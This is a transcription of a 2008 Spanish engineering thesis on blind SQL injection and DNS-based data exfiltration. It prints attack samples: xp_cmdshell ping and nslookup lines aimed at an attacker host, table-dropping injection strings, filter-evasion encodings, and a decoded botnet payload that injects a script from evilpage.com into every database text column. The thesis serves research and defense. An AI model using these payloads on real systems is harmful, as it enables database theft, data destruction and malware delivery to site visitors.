UNIVERSIDAD PONTIFICIA COMILLAS

Tamaño: px
Comenzar la demostración a partir de la página:

Download "UNIVERSIDAD PONTIFICIA COMILLAS"

Transcripción

1 UNIVERSIDAD PONTIFICIA COMILLAS ESCUELA TÉCNICA SUPERIOR DE INGENIERÍA (ICAI) INGENIERO EN INFORMÁTICA PROYECTO FIN DE CARRERA WEAPONIZED BLIND SQL INJECTION EXPLOITATION AND CONTENT RETRIEVAL ON SQL SERVER SYSTEMS VIA DNS DATA EXFILTRATION AND CROSS-DMZ TUNNELING PERTRECHAMIENTO DE ATAQUES DE INYECCIÓN SQL CIEGA Y EXTRACCIÓN DE CONTENIDO EN SISTEMAS SQL SERVER MEDIANTE EXFILTRACIÓN DE DATOS VÍA DNS Y ENCAMINAMIENTO SOBRE LA ZONA DESMILITARIZADA AUTOR: Ángel Prado Montes DIRECTOR: Adrian Bethune Madrid, Septiembre 2008

2 Autorizada la entrega del proyecto del alumno/a: Angel Prado EL DIRECTOR DEL PROYECTO Adrian Bethune Fdo.: Fecha: / 09 / 08 Vº Bº del Coordinador de Proyectos David Contreras Bárcena Fdo.: Fecha: / 09 / 08

3 UNIVERSIDAD PONTIFICIA COMILLAS ESCUELA TÉCNICA SUPERIOR DE INGENIERÍA (ICAI) INGENIERO EN INFORMÁTICA PROYECTO FIN DE CARRERA WEAPONIZED BLIND SQL INJECTION EXPLOITATION AND CONTENT RETRIEVAL ON SQL SERVER SYSTEMS VIA DNS DATA EXFILTRATION AND CROSS-DMZ TUNNELING PERTRECHAMIENTO DE ATAQUES DE INYECCIÓN SQL CIEGA Y EXTRACCIÓN DE DATOS EN SISTEMAS SQL SERVER MEDIANTE EXFILTRACIÓN DE DATOS VÍA DNS Y ENCAMINAMIENTO SOBRE LA ZONA DESMILITARIZADA AUTOR: Ángel Prado Montes DIRECTOR: Adrian Bethune Madrid, Septiembre 2008

4 AGRADECIMIENTOS A mis padres, cuya tenacidad e insistencia ha permitido que mi formación académica llegase a buen puerto. A José Luís Gahete, por ser un referente en los buenos momentos y dificultades varias durante mi vida académica. A Miguel Ángel Sanz Bobi, por inspirarme en este arte llamado ingeniería bien antes de formar parte de esta casa. A todos mis grandes amigos de Microsoft USA y Microsoft Ibérica, con especial mención a mi colega Chema Alonso de informática 64 y MVP de Windows Security, cuya investigación sobre inyección de SQL a ciegas por tiempo con consultas pesadas me ha servido de gran referente. Por último, extender mis agradecimientos a Adrian Bethune, mi coordinador de proyecto en Estados Unidos y gran guía en mi aventura americana.

5 RESUMEN La inyección SQL es uno de los ataques más conocidos y documentados hoy en día, e identificado como uno de los vectores más frecuentes para ataques en aplicaciones web por el instituto internacional SANS en su informe anual de riesgos de seguridad En los comienzos de estos ataques, era más sencillo encontrar un sitio web vulnerable que uno que no lo fuese. A medida que avanzaron los años, los administradores de cortafuegos prepararon mecanismos de protección entorno a aplicaciones basadas en datos para evitar que los atacantes pudieran revertir conexiones TCP en su búsqueda insaciable para obtener información ajena cuando los métodos tradicionales de inyección con devolución de resultados no estaban presentes. Durante años, los diferentes agentes han sido alertados del peligro que suponen los ataques de inyección SQL ciega, si bien a día de hoy nos encontramos con numerosos sitios en operación, totalmente vulnerables. Los desarrolladores web y administradores de sistemas no son conscientes de cual es el impacto real de estas vulnerabilidades. Herramientas modernas como Absinthe, SQL Ninja o SQL Brute son capaces de explotar inyección SQL ciega hoy por hoy. Sin embargo, el actual estado del arte es un tanto lento y limitado al paradigma de la booleanización, que consiste en extraer 1 bit por cada consulta formulada específicamente para retornar un resultado verdadero o falso, o utilizando métodos de espera como WAITFOR para, lentamente, obtener datos de una forma binaria. Es evidente que ante la ausencia de métodos convencionales, la extracción de datos mediante inyección SQL ciega puede consumir mucho tiempo y producir un ruido de tráfico no deseable. Dado que la inyección es ciega, el atacante no puede obtener datos con los convencionales UNION SELECT o utilizar mensajes de error. Incluso con la ayuda de herramientas I

6 automatizadas, este proceso es lento dado que el atacante necesita una petición por cada bit de datos que desea extraer, resultando en cientos o miles de consultas. Estos métodos tradicionales son fácilmente detectados por mecanismos de detección de intrusos y no proporcionan un canal sostenible y estable para obtener los datos de una aplicación insegura. Este proyecto describe una nueva alternativa más veloz basada en el protocolo DNS como mecanismo de transmisión. Las diferentes técnicas que pueden utilizar los atacantes para explotar la exfiltración DNS también son ilustradas, introduciendo nuevas posibilidades para alcanzar lo que antes eran puntos de acceso de inyección ciega incontrovertibles. Esto permite a un atacante malicioso atravesar la cadena de resoluciones DNS y cruzar las zonas corporativas desmilitarizadas (DMZ) con una facilidad preocupante. Un atacante puede entonces capturar el tráfico desde su servidor DNS local y observar las consultas entrantes con datos encapsulados. Durante el curso de la investigación preliminar, se proveen ejemplos educativos para atacar a diferentes versiones de los motores de bases de datos Microsoft SQL Server, MySQL y Oracle. Si bien este proyecto está centrado alrededor de estas plataformas, el concepto es aplicable a la mayoría de los productos comerciales de bases de datos. Finalmente, la herramienta prueba de concepto en la que se basa este proyecto es revelada, cubriendo tópicos técnicos variados desde su desarrollo hasta los protocolos internos de transferencia hexadecimal. Se proporcionan demostraciones de escenarios donde se ejecuta la herramienta para mostrar las diferentes formas de obtener el esquema de una base de datos y los datos de sus diferentes tablas de una forma totalmente automatizada, utilizando DNS como el mecanismo principal de extracción. II

7 A diferencia de otras herramientas, lo que aquí se presenta no requiere disparidad alguna entre consultas satisfactorias e insatisfactorias para acometer su objetivo. Su ancho de banda es sustancialmente más rápido comparado con métodos existentes, dado que se pueden obtener hasta 200 caracteres por consulta, al contrario que los sistemas actuales de un bit simultaneo. Adicionalmente, la herramienta no requiere diferencias significativas en tiempo. Con la descripción del funcionamiento interno de estos nuevos ataques y la exposición de una herramienta automatizada para la explotación de los mismos, el autor pretende subrayar la importancia de establecer prácticas de desarrollo seguro para aplicaciones web, y no confiar la seguridad de sitios online enteramente a defensas perimetrales muchas veces configuradas inconsistentemente. El propósito último es que la comunidad se percate de que la información confidencial es extremamente susceptible a estos ataques, y sólo se requiere un punto de acceso SQL para comprometer la seguridad de una organización al completo. III

8 ABSTRACT SQL Injection is widely known and documented as one of the top two attack vectors for web applications, as identified by the international SANS institute in the 2007 annual security risks update. In the early days of these attacks it was almost easier to locate a vulnerable website than not. More and more, firewall administrators setup protection mechanisms around data driven applications to prevent attackers from easily reverting TCP connections on their quest for private data leaking whenever the obsolete verbose methods are not present. For years, people have been warned about blind SQL injection attacks, yet to this day we still find plenty of vulnerable websites out there. Web developers and system administrators do not fully realize what the real impact of these vulnerabilities is. Modern tools like Absinthe, SQL Ninja or SQL Brute assist in exploiting blind SQL injection today. However, the current state of the art is rather slow and limited to the data booleanization paradigm, which consists in extracting 1 bit at a time by asking yes or no queries or using WAITFOR delay methods in order to slowly retrieve data in a bitwise fashion. It s clear that when conventional methods are not possible, exfiltrating data via blind SQL injection vulnerabilities can be rather time-consuming, not to mention undesirably noisy. Since the injection is blind, the attacker can t just retrieve data with a conventional UNION SELECT or by using standard error messages. Even with the help of automated tools, this process is slow due to the fact that an attacker would normally require 1 request for each bit of data to be extracted, resulting in several hundreds or even thousands of queries. Traditional exploitation of blind SQL injection easily triggers intrusion detection mechanisms and does not provide a reliable channel for obtaining data back from a compromised application

9 This project describes a new, faster alternative based on DNS. The different techniques for attackers to take advantage of SQL Injection vulnerabilities using DNS exfiltration are also illustrated, unlocking new possibilities of reaching previously incontrovertible blind SQL injection access points. This enables an attacker to easily traverse the DNS resolver chain and happily cross corporate demilitarized zones (DMZ). An attacker can then sniff traffic to his DNS server endpoint and watch for incoming encapsulated data requests. During the course of the preliminary research, educational exploitation examples for different versions of Microsoft SQL Server, MySQL and Oracle database engines are provided. While this project and tool are focused around these platforms, the concept is applicable to most commercial database products. Finally, the proof-of-concept tool this project revolves around is revealed, covering topics ranging from its development to the internal hexadecimal data transfer protocols. The tool is exercised in a comprehensive way to evidence the different ways to fetch a database schema and data from its tables in an automated fashion, by using DNS as its core exfiltration mechanism. Unlike other tools, what is presented here does not require any disparity between successful and unsuccessful queries to work. Its throughput is substantially faster than existing methods since it can retrieve up to 200 characters per query, versus the conventional one byte of information at a time approaches. In addition, noticeable differences in timing are not required. By describing the inner workings of these new attacks and providing an automated tool for its exploitation, the author aims to stress the importance of establishing secure development best practices for web applications and not only to entrust site security to the loosely configured perimeter - 2 -

10 defences. The ultimate purpose is to help people realize that their confidential information is extremely susceptible to these attacks, and it only takes one SQL access point to compromise an entire organization

11 ÍNDICE 1. Introducción y Planteamiento del proyecto Introducción Conceptos básicos SQL Inyección SQL Técnicas de evasión de filtrado Protocolo DNS DMZ Shell inversa Sistemas IDS Motivación Objetivos principales del proyecto Estado del arte Técnicas de exfiltración de datos Inyección con salida directa HTML en línea Inyección Ciega Basada en errores Basada en cambio en página Basada en tiempo con consultas pesadas Alternativas Nueva técnica: Exfiltración DNS Conceptos fundamentales Exfiltración DNS Obteniendo la estructura de tablas Desarrollo

12 Introducción Funcionamiento interno Protocolo de codificación sobre DNS Arquitectura Limitaciones de DNS Gestión de duplicados Integridad de envíos Como evitar ataques SQL Análisis económico del proyecto Introducción Coste de investigación Coste de tecnología Coste de implantación Costes operacionales Conclusión Planificación del proyecto Trabajo futuro y conclusiones Bibliografía Anexo I: Código fuente, binarios y manual

13 Capítulo 1 Introducción y Planteamiento del proyecto - 6 -

14 1.1 INTRODUCCIÓN Hoy por hoy los vectores de ataque basados en inyección SQL son sobradamente entendidos por la comunidad, y el número de sitios web que son vulnerables crece continuamente de una forma alarmante. En el pasado, era bastante común que los servidores SQL comprometidos en ataques estuvieran detrás de un cortafuegos bastante liberal, facilitando al atacante conectar a su IP de destino o proxy desde el servidor SQL comprometido mediante una shell inversa para establecer un canal funcional. Sin embargo, últimamente, los administradores de firewall han comenzado a imponer bloqueos y políticas de seguridad para las aplicaciones basadas en datos (data driven applications) y mejoraron sus arquitecturas de seguridad. Fue entonces cuando los hackers empezaron a comprender que las conexiones reversas TCP, fundación de muchas shells inversas y ataques clásicos, ya no eran tan efectivas. Es patente que los ingenieros de cortafuegos estaban adelantados en su tiempo a los desarrolladores de aplicaciones web. Esto dejo a las mentes siempre creativas de aquel que desea la información ajena con dos opciones obvias: Encontrar un canal UDP para determinar si la ejecución del código era satisfactoria, o hacer uso de ataques basados en tiempo o errores para determinar si el código se llegaba a ejecutar satisfactoriamente. Una alternativa interesante, es que la mayoría de implantaciones de sistemas operativos proveen un canal UDP para determinar si nuestro código se está ejecutando satisfactoriamente, gracias al ubicuo comando nslookup. Básicamente, si un atacante creía que se estaba ejecutando su sentencia a través de una cadena de inyección SQL, el siguiente código bastaría para una simple verificación: Ángel Prado Septiembre

15 exec master..xp_cmdshell('ping n 10 ip.ata.can.te'). De esta forma, el atacante monitorizaría el trafico dns hacia su máquina, mediante herramientas como netcat o capturando el trafico utilizando sniffers a nivel de red como ethereal. Si el atacante era capaz de ver una consulta ICMP procedente del servidor infectado, esto sería una clara señal de que la ejecución ciega estaba ocurriendo satisfactoriamente. En caso de que el servidor bloquease tráfico ICMP, una simple resolución de nombre de dominio serviría como punto de contacto: exec master..xp_cmdshell('nslookup mihostname.es') De esta forma, incluso si SQL Server fuese incapaz de realizar peticiones DNS externas directamente, la petición de nslookup atravesaría la cadena de resolución y eventualmente algún servidor DNS transferiría mediante delegación la petición inicial hacia el servicio residente en mihostname.es Esto sirve exclusivamente como propósito de confirmación: cuando el atacante lleva a cabo su inyección, simplemente necesita capturar el tráfico entrante en su servidor DNS para ver las peticiones externas, y confirma que efectivamente, xp_cmdshell y cualquier código asociado se ejecuto satisfactoriamente en la máquina víctima. Aunque el puerto UDP estuviera abierto, no se puede establecer una conexión directa con el atacante bajo UDP:53 pues el cortafuegos lo impedirá en condiciones normales. Sin embargo, nada nos impide hacer Ángel Prado Septiembre

16 llegar la confirmación mediante el sistema de delegación en cadena propio de DNS. La siguiente figura ilustra este concepto: Si bien esto es innovador, este proyecto estudiará y llevará a cabo la posibilidad de obtener más que una mera confirmación de ejecución a través de la consulta DNS. Las técnicas que se han utilizado hasta ahora para transmitir datos en inyecciones ciegas (no solo confirmación de éxito) utilizaban cmd.exe o /bin/sh con varios bucles para inyectar SQL, y posteriormente tratar de establecer una conexión inversa con la máquina atacante o un pivote. Para establecer la conexión, se suele utilizar algún puerto común con posibilidades de estar abierto, como por ejemplo el 80. Tras establecer la conexión, facilitaría al atacante los datos que desease (exportar la base de Ángel Prado Septiembre

17 datos entera, por ejemplo), o permitiría la habilidad de ejecutar comandos remotos vía shell con un redirector de comandos. Este tipo de ataque exigía subir un binario a la máquina objetivo, y posteriormente que el binario pudiese realizar una conexión inversa desde la máquina atacante vía TCP, y además asumir que la máquina del atacante estuviera escuchando por TCP y online en ese momento, y no fuera desconectada por el proveedor de servicios. El hecho de poder subir ficheros remotamente a la máquina víctima y establecer conexiones TCP salientes es ya poco frecuente debido a las nuevas políticas de seguridad actuales. La pregunta es ambiciosa: Podemos ejecutar comandos y transferir contenidos enteros de una base de datos mediante inyección SQL en páginas cuyo ataque resulta en una salida completamente normal (inyección ciega)? Todo ello automatizado, sin necesidad de requerir privilegios elevados, sin tener que subir ejecutables, independiente de la arquitectura y marca de base de datos, y sin requerir tráfico TCP saliente. Como diría Michael Howard, experto de seguridad en Microsoft Corp. y autor del famoso libro Writing Secure Code: Una entrada al sistema es un mal hasta que se demuestre lo contrario. Y es precisamente lo que vamos a respaldar. 1.2 CONCEPTOS BÁSICOS A continuación se ofrece una definición de los diferentes conceptos preliminares que serán utilizados a lo largo de las páginas venideras SQL Ángel Prado Septiembre

18 SQL (Structured Query Language) es el lenguaje declarativo de consulta estructurado de acceso a bases de datos diseñado para la obtención y gestión de datos en sistemas relacionales de bases de datos (RDBMS). Además, provee la creación y modificación de esquemas y acceso a objetos. Algunos de los sistemas más populares con los que interactuaremos son Microsoft SQL Server, Oracle SQL, IBM DB2 y MySQL. Hoy en día todos los lenguajes de programación web populares como PHP, ASP, JSP y RUBY proveen interfaces, no siempre seguras, para conectar con estos sistemas de bases de datos INYECCIÓN SQL La inyección SQL, también conocida como SQL Injection consiste en insertar código SQL dentro de un parámetro web HTTP GET o POST que forma parte de una variable que posteriormente se incluirá como parte de una consulta SQL superior, con el objetivo de alterar su comportamiento habitual. Esto sucede debido a un pobre e insuficiente filtrado a nivel de validación de la aplicación, que nos permite insertar código SQL malicioso dentro de variables que son posteriormente utilizadas para realizar un propósito diferente al inicialmente pensado por el programador. Caso práctico Imaginemos que tenemos una página web que nos permite ver el perfil del usuario actual. Por ejemplo: El código residente en verperfil.aspx contiene lo siguiente: Ángel Prado Septiembre

19 resultado := "SELECT * FROM usuarios WHERE identificadorusuario = '" + Request.Get("ID") + "';" Uno podría pensar, a buen criterio, que quizás podríamos acceder al perfil de otro usuario mediante la siguiente consulta: Pero suponiendo que hubiera alguna cookie o gestión lógica de sesión que nos lo impidiera, siempre podríamos explotar una vulnerabilidad SQL mediante la inserción del siguiente parámetro en la variable GET, para acceder ilegalmente a todos los usuarios escapando de la consulta original: ID= OR '1'= '1' Aunque la mayoría de las implementaciones de SQL Server permiten ejecutar varias consultas a la vez, la función de php mysql_query solo permite una consulta por motivos de seguridad. Sin embargo esto no impide que usuarios malintencionados modifiquen la consulta. El siguiente ejemplo es una inyección que borraría la tabla de usuarios en un sistema que permitiera múltiples consultas: ID=a';DROP TABLE users; Por último, un ejemplo más sencillo suponiendo que podemos ver por entero la salida de nuestra consulta SQL, sería realizar una subconsulta (subquery) o un enlace UNION para obtener los datos que buscamos: ID=1 UNION SELECT * FROM usuarios Ángel Prado Septiembre

20 Como podemos ver, un atacante puede alterar fácilmente cualquier consulta susceptible de inyección para lograr un resultado funcional pero esperado por la aplicación. Evidentemente el ataque es tan peligroso en la medida de los datos que se desean interceptar. Los atacantes no necesitan ni siquiera ser conocedores del lenguaje estructurado. Decenas de herramientas como SQL Ninja o Metasploit proveen frameworks para utilizar todo tipo de payloads de una forma automatizada, y obtener información privada, tarjetas de crédito, y contraseñas. A menudo, la información más valiosa suele estar con un hash aplicado. Aplicaciones populares utilizan md5 que promete encriptar contraseñas sin guardar su valor. La realidad es que cualquier clave en md5 puede romperse en unos 20 minutos utilizando técnicas de como tablas de lookup precomputadas (rainbow tables). SQL Ninja automatizando un ataque SQL, en acción En resumen, un agujero de este tipo deja prácticamente nuestra base de datos en manos de hackers maliciosos y su creatividad. Las protecciones Ángel Prado Septiembre

21 por defecto no son suficientes como veremos en los capítulos subsiguientes, si bien expondremos las mejores prácticas para detener este tipo de ataques TÉCNICAS DE EVASIÓN DE FILTRADO Si bien es cierto que los desarrolladores y fabricantes de software han creado soluciones para evitar esta creciente amenaza, los atacantes, incansables en su odisea, siempre encuentran una forma creativa de saltarse mencionadas protecciones. La detección de ataques SQL se ha realizado históricamente mediante expresiones regulares o firmas de keywords previamente establecidas, lo que se conoce como blacklisting. Sin embargo esta técnica ya no es efectiva y los atacantes son capaces de encontrar consultas que pasarán inadvertidas a través de las múltiples capas de infraestructura, incluso engañando a web firewalls y módulos como el popular apache mod_security. Las expresiones regulares fracasan porque no pueden expresarse para todos los campos. Por ejemplo, no existe virtualmente ninguna expresión regular o patrón que pueda regular la descripción de una dirección física. Inicialmente, los sistemas de detección basados en firmas y patrones funcionaban con precisión dado que los ataques realizados eran muy básicos y utilizaban comandos SQL relativamente simples. Un simple ;DELETE FROM USERS WHERE 1=1 era suficiente para destrozar los datos de una organización si los desarrolladores no habían anticipado esa posibilidad. Sin embargo, estas técnicas rápidamente se encontraron con nuevos mecanismos de protección basados en reconocimiento de patrones. Las variaciones del lenguaje permiten construir expresiones sintácticamente válidas si bien intrínsicamente peligrosas. El problema fundamental radica en que SQL permite muchas variaciones en la forma de que los comandos Ángel Prado Septiembre

22 son construidos, incluyendo codificación multilenguaje, variación de espacios, comentarios... Ataque SQL tradicional: OR 1 = 1 Técnica de evasión: manipulación de espacios Nuevo ataque: OR 1 = 1 Ataque SQL tradicional: &id=111 UNION /* */ SELECT * Técnica de evasión: rotura de comentarios para evitar expresiones regulares basadas en lista negra (SELECT, UNION ) Nuevo ataque: &id=111/*este es un comentario */UN/* puedes */IO/* encontrar */N/**/S/**E/* */LE/* el parámetro maligno?*/ct/*difícilmente */ Ataque SQL tradicional: 1 UNION SELECT ALL FROM TABLE Técnica de evasión: Codificación decimal Ángel Prado Septiembre

23 Nuevo ataque: &#49&#32&#85&#78&#73&#79 &#69&#82&#69 Ataque SQL tradicional: OR 1 = 1 Técnica de evasión: variación de temática Nuevo ataque: OR ciudad = ciudad Este tipo de variaciones son más frecuentes de lo que parecen. Recientemente, decenas de miles de máquinas ejecutando instancias SQL Server con validación de parámetros insegura fueron comprometidas por una rede de robots (botnet) automatizada que reemplazaba todas las entradas de la base de datos con un iframe apuntando a JavaScript malicioso. El código utilizado en cuestión tiene el siguiente patrón: Ángel Prado Septiembre

24 C C C F F F F C E006E D C E006E D F006D F A C F006C D006E E D E E E D E E D F E D F E D F E D F E C F F E F004D C F F E F C C F D E B B B D B B B D003D D F006E C005B B B D B C D A002F002F E E F006D002F A E0 06A E003C002F E E F004D C F F E F C E C004F C F F C004C004F C Lo cual obviamente salta cualquier protección firewall, sobre todo si se transmite mediante HTTP POST, al carecer de expresiones reconocibles para cortafuegos a nivel lógico. Ángel Prado Septiembre

25 Este código, una vez descifrado por el agente SQL, se traduce en lo siguiente varchar(255) DECLARE Table_Cursor CURSOR FOR Select a.name,b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO BEGIN exec('update set ''<script src=http://www.evilpage.com/fjp.js></script>''') FETCH NEXT FROM Table_Cursor INTO END CLOSE Table_Cursor DEALLOCATE Table_Cursor Esto es posible debido a la evasión utilizada mediante el comando CAST() que convierte el largo texto en hexadecimal a NVARCHAR y finalmente ejecuta dicha cadena de texto. El código SQL que finalmente se ejecuta efectivamente hace un bucle sobre todas las columnas textuales de la base de datos y adjunta un script HTML que comprometerá los navegadores vulnerables de todos los visitantes del sitio legítimo. Todo ello en un proceso automatizado mediante una botnet distribuida. Ángel Prado Septiembre

26 La pregunta de cómo un atacante encuentra sitios vulnerables es algo a lo que no vamos a dedicar tiempo en este proyecto. Desde un escaneo heurístico en alojamiento compartido hasta métodos tan rústicos como búsquedas en Google sobre un nombre determinado de script php/asp/jsp vulnerable se pueden combinar para encontrar una lista interminable de víctimas PROTOCOLO DNS El servicio de DNS (Domain Name System) es un sistema de nombres de dominio utilizado para asignar nombres (hostnames) a los diferentes ordenadores y dispositivos en Internet. Nos permite resolver nombres de máquinas (A ZONEs) a direcciones IP y viceversa (reverse dns lookup). Por ejemplo, host: se traduce a la dirección IP estática El protocolo DNS tiene una estructura jerárquica de dominios, separados por puntos y que empiezan por el subdominio inferior o de primer nivel. Las normas para los dominios vienen determinadas por la ICANN (Internet Corporation for Assigned Names and Numbers). Dominios de nivel superior incluyen.com (comercial),.net (networking) y.org (organización). Dominios geográficos suponen otra gran parte de la distribución total, por ejemplo.es indica España y.us es el símbolo para los Estados Unidos de América. En el protocolo DNS, cada dominio por debajo de los dominios de primer nivel puede estar formado como máximo por 63 caracteres (este es un dato importante que utilizaremos más adelante). Generalmente la longitud Ángel Prado Septiembre

27 máxima de un dominio en total, incluyendo dos niveles de subdominio no debe exceder los 200 caracteres. No se permite el uso de caracteres especiales. Simplemente a-z, A-Z, 0-9 y el guión simple -. Una solicitud DNS se realiza generalmente por el puerto UDP 53 (NAMESRV). El cliente pide al servidor DNS inmediato que tenga configurado la resolución de dicho host. En el caso de que el servidor no tenga dicho host en el caché, o que esté en el caché pero con un TTL expirado, el servidor inmediato delegará la petición hacia arriba de la cadena, hasta llegar eventualmente a un servidor que conozca la respuesta o hacia los registros NS del denominado root server (servidor raíz), que devolverá la IP del dominio en cuestión y delegará en sus registros NS para resolver cualquier subdominio asociado. Finalmente, el servidor DNS del dominio a resolver tiene la última palabra sobre que IP corresponde a que subdominio, y trata directamente todas las consultas que no se encuentren almacenadas en la caché. El comando nslookup puede indicarnos cuales son los servidores NS principales asociados a un dominio determinado. El concepto del TTL es particularmente interesante: indica el tiempo que un servidor DNS tiene permitido mantener en la caché cualquier registro existente. Si el TTL es muy bajo, se forzará una consulta hacia dicho dominio tan pronto expire y una nueva query lo requiera. Cabe remarcar que el protocolo DNS es de por si inseguro. Dan Kaminsky, de IOActive y Microsoft USA descubrió recientemente una vulnerabilidad crítica que permite falsificar en cuestión de segundos cualquier dirección DNS en servidores vulnerables. El problema radica en que las direcciones IP de origen pueden ser imperdonadas debido al diseño de UDP, y que el ID de transacción de DNS TXID es de 16 bits, lo cual es débil y fácilmente crackeable. Si esto no fuera suficiente, no es necesario esperar a la expiración del TTL para proseguir con la adivinación del TXID tras un intento Ángel Prado Septiembre

WEAPONIZED BLIND SQL INJECTION EXPLOITATION AND CONTENT RETRIEVAL ON SQL SERVER SYSTEMS VIA DNS DATA EXFILTRATION AND CROSS-DMZ TUNNELING

WEAPONIZED BLIND SQL INJECTION EXPLOITATION AND CONTENT RETRIEVAL ON SQL SERVER SYSTEMS VIA DNS DATA EXFILTRATION AND CROSS-DMZ TUNNELING WEAPONIZED BLIND SQL INJECTION EXPLOITATION AND CONTENT RETRIEVAL ON SQL SERVER SYSTEMS VIA DNS DATA EXFILTRATION AND CROSS-DMZ TUNNELING Autor: Angel Prado Director: Adrian Bethune Entidad colaboradora:

Más detalles

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

SEGURIDAD EN SISTEMAS INFORMÁTICOS

SEGURIDAD EN SISTEMAS INFORMÁTICOS Universidad Pública de Navarra Grupo de Redes, Sistemas y Servicios Telemáticos SEGURIDAD EN SISTEMAS INFORMÁTICOS Práctica 3 Seguridad perimetral: Filtrado de paquetes (Primera Parte) Introducción En

Más detalles

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.

Más detalles

SIE - Firewall DMZ. Protección perimetral para su red local. 1. Importancia de los firewalls. 2. Arquitectura de la red

SIE - Firewall DMZ. Protección perimetral para su red local. 1. Importancia de los firewalls. 2. Arquitectura de la red Protección perimetral para su red local por ALBA Software SIE Firewall es un sistema pensado para proteger la red de su empresa de posibles ataques de Internet. El firewall actua de barrera separando la

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas W8: wexplor VIROLOGÌA Y CRIPTOLOGÌA 4NM73 W8:INTERNET EXPLORER U5: FILE TRANSFER

Más detalles

1) Proxy, Cortafuegos, que son? Pág.2. 2) Funcionamiento de un proxy Pág.3. 3) Proxy NAT / Enmascaramiento Pág.3

1) Proxy, Cortafuegos, que son? Pág.2. 2) Funcionamiento de un proxy Pág.3. 3) Proxy NAT / Enmascaramiento Pág.3 Indice 1) Proxy, Cortafuegos, que son? Pág.2 2) Funcionamiento de un proxy Pág.3 3) Proxy NAT / Enmascaramiento Pág.3 4) Servidores proxy / Servidores de Sockets Pág.4 5) Proxy de web / Proxy cache de

Más detalles

MÁSTER ONLINE EN ADMINISTRACIÓN LINUX

MÁSTER ONLINE EN ADMINISTRACIÓN LINUX MÁSTER ONLINE EN ADMINISTRACIÓN LINUX Módulo 1 Hardware & Arquitectura de sistemas - 20 horas Este módulo permite conocer y configurar los elementos básicos del hardware del sistema, como también otros

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal

Más detalles

Intrusion Detection/Prevention Systems SNORT.

Intrusion Detection/Prevention Systems SNORT. Intrusion Detection/Prevention Systems SNORT. Miguel Angel Rodriguez Yamid Armando Pantoja Juan Carlos Pantoja Universidad de Nariño Facultad de Ingeniería Programa Ingeniería de Sistemas 11 de diciembre

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

Tema 41.- Medidas de seguridad en conectividad de redes: Cortafuegos, IDS, IPS, filtro de contenidos.

Tema 41.- Medidas de seguridad en conectividad de redes: Cortafuegos, IDS, IPS, filtro de contenidos. Tema 41.- Medidas de seguridad en conectividad de redes: Cortafuegos, IDS, IPS, filtro de contenidos. Introducción...1 1 Cortafuegos Firewall-... 3 1.1 Políticas de control de acceso... 4 1.2 Órganización

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

S E G U R I D A D E N A P L I C A C I O N E S W E B

S E G U R I D A D E N A P L I C A C I O N E S W E B H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A

Más detalles

Fuzzing y seguridad. José Miguel Esparza Muñoz Security Researcher S21sec labs. 10 de agosto de 2007

Fuzzing y seguridad. José Miguel Esparza Muñoz Security Researcher S21sec labs. 10 de agosto de 2007 Fuzzing y seguridad José Miguel Esparza Muñoz Security Researcher S21sec labs 10 de agosto de 2007 Resumen Con este artículo se pretende dar las nociones básicas para el acercamiento del lector a una de

Más detalles

